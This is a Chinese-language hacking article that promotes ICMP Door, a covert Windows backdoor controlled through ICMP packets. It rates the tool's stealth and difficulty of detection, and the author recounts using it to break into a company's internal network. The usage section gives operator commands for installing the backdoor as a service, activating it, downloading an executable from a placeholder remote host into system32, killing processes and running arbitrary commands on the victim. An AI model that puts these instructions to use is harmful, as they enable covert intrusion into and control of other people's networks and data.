經典后門實例之C/S后門
C/S構架通常被傳統的木馬后門程序所使用,C/S后門的構架使得網絡黑客很容易對其控制,也一定程度使得后門私有化,避免了萬能密碼的出現。但是關于C/S后門的概念比較模糊,其實很多的后門都可以歸結為C/S后門這一類,不過其中最巧妙的,也就是我們今天所舉例的ICMP Door。
ICMP Door
類型:系統后門
使用范圍:win2000/xp/2003
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個后門利用ICMP通道進行通信,所以不開任何端口,只是利用系統本身的ICMP包進行控制安裝成系統服務后,開機自動運行,可以穿透很多防火墻——很明顯可以看出它的最大特點:不開任何端口~只通過ICMP控制!和上面任何一款后門程序相比,它的控制方式是很特殊的,連80端口都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個后門其實用途最廣的地方在于突破網關后對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機并不是我們想到位的商業網絡進行入侵檢測,它的網絡內部并不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網絡安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多后門后,最后ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個后門。
首先使用icmpsrv.exe -install參數進行后門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe -hkfx.exe]方式下載文件,保存在[url=file://\\system32\]\\system32\[/url]目錄下,文件名為hkfx.exe,程序名前的“-”不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。
這個后門是采用的c/s構架,必須要使用icmpsend才能激活服務器,但是他也有自己的先天不足:后門依靠ICMP進行通訊,現在的網絡,經過沖擊波的洗禮后,很少有服務器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制服務器不是一個好辦法,這也是我為什么用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧?!
【編輯推薦】
